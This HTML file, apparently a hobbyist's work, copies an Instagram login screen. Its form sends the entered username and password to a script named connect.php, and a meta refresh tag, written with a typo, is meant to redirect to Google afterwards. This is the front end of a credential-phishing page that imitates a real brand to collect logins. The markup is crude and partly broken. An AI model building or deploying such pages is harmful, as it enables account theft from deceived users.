<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="author" content="mukesh kumar">
	<mata http-equiv="refresh" content="3;url="https://www.google.com">
	<title>intagram login page</title>
    <style>
	   	form{
	   		float:right;
	   		border: 2px white;
	   		margin-right: 420px;
	   		font-size: 20px;
	   		background-color:white;
	   		height: 300px;
	   		padding: 50x;
	   }
	   input{
	   	margin: 10px;
	   	font-size: 21px;
	   	width: 297px;
	   	font-size: 15px;
	   	height: 40px;
	   }
	   label{
	   	height: 30px;
	   }
	     img{
	     	margin-left:250px ;
	     }
	     pre{
	     	font-weight: bold;
	     	font-size: 60px;
	     	font-family:unset ;
	     	height: 30px;
	     	
	     }
	     button{
	     	height: 40px;
	     	width: 310px;
	     	margin-top: 9px;
	     }
	     .log{
	     	color: black;
	     	background-color: royalblue;
	     	border-radius: 5px;
	     	font-size: 18px;
	     
	     }
	     .forgot{
	     	color: blue;
	     	margin-left: 180px;
	     	font-weight: bold;
	     	font-size: 	15px;
	     }
	     .line{
	     	background-color:wheat;					;
	     	margin: 10px;
	     	height: 3px;
	     }
	     .or{
	     	padding: 0px;
	     	height: 0px;

	     }
         .facebook{

               height: 49px;
               margin: 30px;
               color: royalblue;
               font-weight: bold;
               font-family:sans-serif;
         }

	   </style>  
</head>
<body>
	<img height="500" src="C:\Users\lenovo\OneDrive\Desktop\Pictures\Screenshot 2024-07-04 115438.png">
	<form action="connect.php" method="post" style="text-align:center;action="post">
        <pre>instagram</pre> 
		       <input type="text" id="username"name="username" placeholder="phone number,email or username">
		          <br>
		           <input type="text" id="password"name="password" placeholder=" password">
		            <div class="forgot">
           	  forgot password?
           </div>
            <button class="log">
           	log in
          </button>
           <div class="line">
           </div>
           <div>OR</div>
           <div class="facebook">log in with facebook</div>
      </form>

</body>
</html>